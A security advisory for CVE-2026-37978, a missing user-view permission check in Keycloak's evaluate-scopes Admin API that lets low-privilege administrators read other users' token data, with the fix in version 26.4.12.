CVE-2026-37978

Vulnerability

A flaw exists in Keycloak (26.4.11 and earlier) where the evaluate-scopes Admin API endpoints accept an arbitrary userId parameter but only validate that the caller has the view-clients role. No call to auth.users().requireView() or equivalent user-view permission check is performed, as described in [4]. This allows a low-privilege administrator with only the view-clients role to invoke the endpoint and generate example tokens containing full profile and role data for any targeted user in the realm [1][4].

Exploitation

An attacker who is a low-privilege administrator with the view-clients role (and network access to the Admin API) can call the evaluate-scopes endpoint while supplying an arbitrary userId parameter. The server does not verify that the attacker is authorized to view that user's data, returning example tokens that include the targeted user's full identity and authorization information [1][4].

Impact

Successful exploitation results in cross-role personally identifiable information (PII) leakage, allowing unauthorized visibility into user identities and authorizations across the realm. The attacker gains information disclosure of sensitive user data, including profile attributes and role memberships, without needing any additional privileges [1][4].

Mitigation

Red Hat has released updated images and packages with Keycloak 26.4.12, which fixes the vulnerability. Red Hat build of Keycloak 26.4.12 Images (RHSA-2026:19597) [2] and Red Hat build of Keycloak 26.4.12 packages (RHSA-2026:19596) [3] are available. Administrators should update to version 26.4.12 immediately. No workaround is provided in the available references; the fix requires upgrading the Keycloak instance.